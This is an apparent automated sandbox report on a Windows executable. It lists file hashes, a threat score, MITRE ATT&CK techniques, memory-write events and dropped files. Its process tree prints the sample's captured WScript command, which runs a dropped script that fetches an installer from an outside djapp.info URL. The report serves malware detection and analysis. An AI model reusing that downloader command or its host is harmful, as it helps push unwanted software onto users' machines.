8a14106d89632fe3b77fd5d95725f524b8db56fc677f5de1a4b6ce9cedaa47eb

Analysis

max time kernel
119s
max time network
120s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
10/05/2024, 19:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

309e9081e3bda71196aec8f73ff9ef4a_JaffaCakes118.exe
Size

184KB
MD5

309e9081e3bda71196aec8f73ff9ef4a
SHA1

b3c14358c1a37a084931ab6b364ac5cb8a90988f
SHA256

8a14106d89632fe3b77fd5d95725f524b8db56fc677f5de1a4b6ce9cedaa47eb
SHA512

c93e8c75ac9202d92c6386e530272747ba5e82a1da8e55c306296d0b0908c1c27a54b03aa7be72518f5f4485c5eb35c99bb6cea642a26d4e87b691f067abfed5
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3a:/7BSH8zUB+nGESaaRvoB7FJNndn3

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 11 IoCs

flow	pid	Process
6	2296	WScript.exe
8	2296	WScript.exe
10	2296	WScript.exe
12	2668	WScript.exe
13	2668	WScript.exe
15	2020	WScript.exe
16	2020	WScript.exe
18	2348	WScript.exe
19	2348	WScript.exe
21	1584	WScript.exe
22	1584	WScript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1492	2864	WerFault.exe	27

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 2864 wrote to memory of 2296	2864	309e9081e3bda71196aec8f73ff9ef4a_JaffaCakes118.exe	28
PID 2864 wrote to memory of 2296	2864	309e9081e3bda71196aec8f73ff9ef4a_JaffaCakes118.exe	28
PID 2864 wrote to memory of 2296	2864	309e9081e3bda71196aec8f73ff9ef4a_JaffaCakes118.exe	28
PID 2864 wrote to memory of 2296	2864	309e9081e3bda71196aec8f73ff9ef4a_JaffaCakes118.exe	28
PID 2864 wrote to memory of 2668	2864	309e9081e3bda71196aec8f73ff9ef4a_JaffaCakes118.exe	30
PID 2864 wrote to memory of 2668	2864	309e9081e3bda71196aec8f73ff9ef4a_JaffaCakes118.exe	30
PID 2864 wrote to memory of 2668	2864	309e9081e3bda71196aec8f73ff9ef4a_JaffaCakes118.exe	30
PID 2864 wrote to memory of 2668	2864	309e9081e3bda71196aec8f73ff9ef4a_JaffaCakes118.exe	30
PID 2864 wrote to memory of 2020	2864	309e9081e3bda71196aec8f73ff9ef4a_JaffaCakes118.exe	32
PID 2864 wrote to memory of 2020	2864	309e9081e3bda71196aec8f73ff9ef4a_JaffaCakes118.exe	32
PID 2864 wrote to memory of 2020	2864	309e9081e3bda71196aec8f73ff9ef4a_JaffaCakes118.exe	32
PID 2864 wrote to memory of 2020	2864	309e9081e3bda71196aec8f73ff9ef4a_JaffaCakes118.exe	32
PID 2864 wrote to memory of 2348	2864	309e9081e3bda71196aec8f73ff9ef4a_JaffaCakes118.exe	34
PID 2864 wrote to memory of 2348	2864	309e9081e3bda71196aec8f73ff9ef4a_JaffaCakes118.exe	34
PID 2864 wrote to memory of 2348	2864	309e9081e3bda71196aec8f73ff9ef4a_JaffaCakes118.exe	34
PID 2864 wrote to memory of 2348	2864	309e9081e3bda71196aec8f73ff9ef4a_JaffaCakes118.exe	34
PID 2864 wrote to memory of 1584	2864	309e9081e3bda71196aec8f73ff9ef4a_JaffaCakes118.exe	36
PID 2864 wrote to memory of 1584	2864	309e9081e3bda71196aec8f73ff9ef4a_JaffaCakes118.exe	36
PID 2864 wrote to memory of 1584	2864	309e9081e3bda71196aec8f73ff9ef4a_JaffaCakes118.exe	36
PID 2864 wrote to memory of 1584	2864	309e9081e3bda71196aec8f73ff9ef4a_JaffaCakes118.exe	36
PID 2864 wrote to memory of 1492	2864	309e9081e3bda71196aec8f73ff9ef4a_JaffaCakes118.exe	38
PID 2864 wrote to memory of 1492	2864	309e9081e3bda71196aec8f73ff9ef4a_JaffaCakes118.exe	38
PID 2864 wrote to memory of 1492	2864	309e9081e3bda71196aec8f73ff9ef4a_JaffaCakes118.exe	38
PID 2864 wrote to memory of 1492	2864	309e9081e3bda71196aec8f73ff9ef4a_JaffaCakes118.exe	38

C:\Users\Admin\AppData\Local\Temp\309e9081e3bda71196aec8f73ff9ef4a_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\309e9081e3bda71196aec8f73ff9ef4a_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2864
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf78F.js" http://www.djapp.info/?domain=ZVSDTKCuWF.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=KoR1JwXQ_LrsDjMuaUM9CgqlVE0PvlMlmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGIgkQVe88uQeqVvF6ZIoKUhkpvZWpzwXHeObuK-6mX4GJU2Nia1-_MKHVlwz C:\Users\Admin\AppData\Local\Temp\fuf78F.exe
  2⤵
  - Blocklisted process makes network request
  PID:2296
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf78F.js" http://www.djapp.info/?domain=ZVSDTKCuWF.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=KoR1JwXQ_LrsDjMuaUM9CgqlVE0PvlMlmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGIgkQVe88uQeqVvF6ZIoKUhkpvZWpzwXHeObuK-6mX4GJU2Nia1-_MKHVlwz C:\Users\Admin\AppData\Local\Temp\fuf78F.exe
  2⤵
  - Blocklisted process makes network request
  PID:2668
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf78F.js" http://www.djapp.info/?domain=ZVSDTKCuWF.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=KoR1JwXQ_LrsDjMuaUM9CgqlVE0PvlMlmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGIgkQVe88uQeqVvF6ZIoKUhkpvZWpzwXHeObuK-6mX4GJU2Nia1-_MKHVlwz C:\Users\Admin\AppData\Local\Temp\fuf78F.exe
  2⤵
  - Blocklisted process makes network request
  PID:2020
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf78F.js" http://www.djapp.info/?domain=ZVSDTKCuWF.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=KoR1JwXQ_LrsDjMuaUM9CgqlVE0PvlMlmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGIgkQVe88uQeqVvF6ZIoKUhkpvZWpzwXHeObuK-6mX4GJU2Nia1-_MKHVlwz C:\Users\Admin\AppData\Local\Temp\fuf78F.exe
  2⤵
  - Blocklisted process makes network request
  PID:2348
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf78F.js" http://www.djapp.info/?domain=ZVSDTKCuWF.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=KoR1JwXQ_LrsDjMuaUM9CgqlVE0PvlMlmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGIgkQVe88uQeqVvF6ZIoKUhkpvZWpzwXHeObuK-6mX4GJU2Nia1-_MKHVlwz C:\Users\Admin\AppData\Local\Temp\fuf78F.exe
  2⤵
  - Blocklisted process makes network request
  PID:1584
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2864 -s 608
  2⤵
  - Program crash
  PID:1492

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
1KB

MD5
d4f07ee61e152f1392d3acfbd611a65d

SHA1
cbad4b0fc4b752be2a4b29ac12b40b9d04d3888a

SHA256
e3568bd51370abfded43c7e09b4f26d1d018e3d0925890d457d0bcf080cfc495

SHA512
209fed14cb895ff81521ed80a93b9c1c10c227b8102d65dddd9fd651fa5990d307a7f3836766f660362caaba2fb6573a2b3e542254eb593466e8696a3b87102e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
724B

MD5
8202a1cd02e7d69597995cabbe881a12

SHA1
8858d9d934b7aa9330ee73de6c476acf19929ff6

SHA256
58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

SHA512
97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
410B

MD5
117faedfa1e471d8f534ab7e47869358

SHA1
9f8ceae6c77b6e321780ea76d9dfa845de2fd11d

SHA256
c91f6952d65d8adec409e1daee6b98eab5bd3e18971505c8f9785edb58b3f1a3

SHA512
8efe1a4d291085e8e957a68e7e6cb2f7b3a9634bfec16ec624a0ee65c49482d011486847429ee36fa79c0e99965d3feea10e46cca4831745da77692cb6a6221d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
ffb9efd68fa5937c4cfe3da8385a63d5

SHA1
370ad6befa59bcc14d17ed746dcb88c513330d9e

SHA256
0c1a3ba44de1fbc08cdcc313830c7c5291077ddbc31f045dfc484d93caa859ff

SHA512
95c4c041c671d314f578084eba47e369c284b0fc1b7a2e8126e85bbd4c85edd1b20d24d927185e34dfde6565ac44e128fff99eda792817067165538d272f181b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
392B

MD5
1c55b640222861bb399f29af65dce281

SHA1
a1c146c92c38514eb24bb22a0c586f2d599420e3

SHA256
ca4af92e5dd411fc1a52ba25be6e4e79cca81cbe841045320381eefc5897354c

SHA512
6aa466acbc7fbf80f2cf11ff1df7f63adcb3a8b51bf12ab254830846a8ccd6c32f4cd958e4a13368bcee7dc9532280c932e293b47dbf7ca564457ed351e005fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MPR7YYBV\domain_profile[1].htm

Filesize
6KB

MD5
475acc4001a6b71b5c8ce381d10a1102

SHA1
04f8e7261391bc8602a6964cdedae694b85b6fb3

SHA256
82e2ff68247c1d9a0dae23de279a8c8c76f4f60af69ee3f31c0ee0e51a9ed05a

SHA512
2e7c0b3ba7f828f76cc385222b4ac8e8cbd34d5bfe4649d0018e2d2f4f751bce0b666c8f28d0c2a4f97a46833f462e9073a97631d9ee2df50e060222a2329046

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MPR7YYBV\domain_profile[1].htm

Filesize
6KB

MD5
d8e9ceaccb5337dba58d26a6590eb2e9

SHA1
e72326038c1a4e57be44d91131bda8641f2fe32f

SHA256
bf736c527bcf9a00a3aad2c2d83f2bd598459e4e15376e22f1203bdb56e41cf6

SHA512
47671033fa3670b56ce3cbc7121739dbd882acc495410095133b90cf785a7f5efb037fa1b0e8cb5b4e4dfe8da51cb9ccfc3e19cb8e812a794262f16646c9cbe2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MPR7YYBV\domain_profile[1].htm

Filesize
6KB

MD5
5a73ec3721cb76289b4bcc1c4850ed05

SHA1
dfe668bf20044650e002200e919dedcf07d61f2d

SHA256
873b104e8be0ae33a202c483ced2da63af661bb1777b7960f6db765511b914bb

SHA512
78931879825ca0e34743e053edf994f1ad2ddf2309be3746a5f1b90d061b88a452206b7966c14a52d9cb18cb7517a1c099193d184753104cbb6ca8df9be2ceb4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VIF0OH2A\domain_profile[1].htm

Filesize
6KB

MD5
015b220f4b8e19890a9cdc0fb8e6ef4d

SHA1
d61face6c499ffa21f9560cdf89164a6a36242ef

SHA256
9eae4f0ee882e4ef791c3661bc33add552a7d5923d8277b696a50cb5b3dddb60

SHA512
e5c40547b7ff54115466f4cbfa9ee3e559a5f4ae87a71da34ccb9aba15ef8ce1acad6b6224c15ce2cff2e97c8a1023b94c32f8742b016bc98fc5aa1bdb2ccad6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VIF0OH2A\domain_profile[1].htm

Filesize
6KB

MD5
9ca48d369061d350ca99e007aa45360e

SHA1
31e61ef587abdec74e13de9391048e112d327b68

SHA256
def8e67b9139fcf0fa60d9004105d977e379bf4116b1c74bea31663da934eb7a

SHA512
2107b20d094929b33436c4d137356c8702a48e9ee7f94c1f5663184b6235f198e6e9a647e065ae83cb5dfac459f1bdda5f766132a5bbc62d23974c5740f1842c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab3717.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar4F78.tmp

Filesize
171KB

MD5
9c0c641c06238516f27941aa1166d427

SHA1
64cd549fb8cf014fcd9312aa7a5b023847b6c977

SHA256
4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

SHA512
936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

Download Submit
C:\Users\Admin\AppData\Local\Temp\fuf78F.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\1KQMPUH3.txt

Filesize
175B

MD5
eeeea51d24f3fdd188013784c9cb526d

SHA1
202c1191c483210dff37395ac62d27d25c16cf91

SHA256
db51e198ff1f8e11c59a6d8517ff8e8ce4fb7e849916c81f9a9f4c2a8ee40cef

SHA512
c0e84ad45855a15e6363edfe524fbe89316839207cf2f689ab5c26a850f48812e9f7c63a3f8c46f07d580fa6f2b72105cb21608e3b5ef80415e9d06bb1c5507b

Download Submit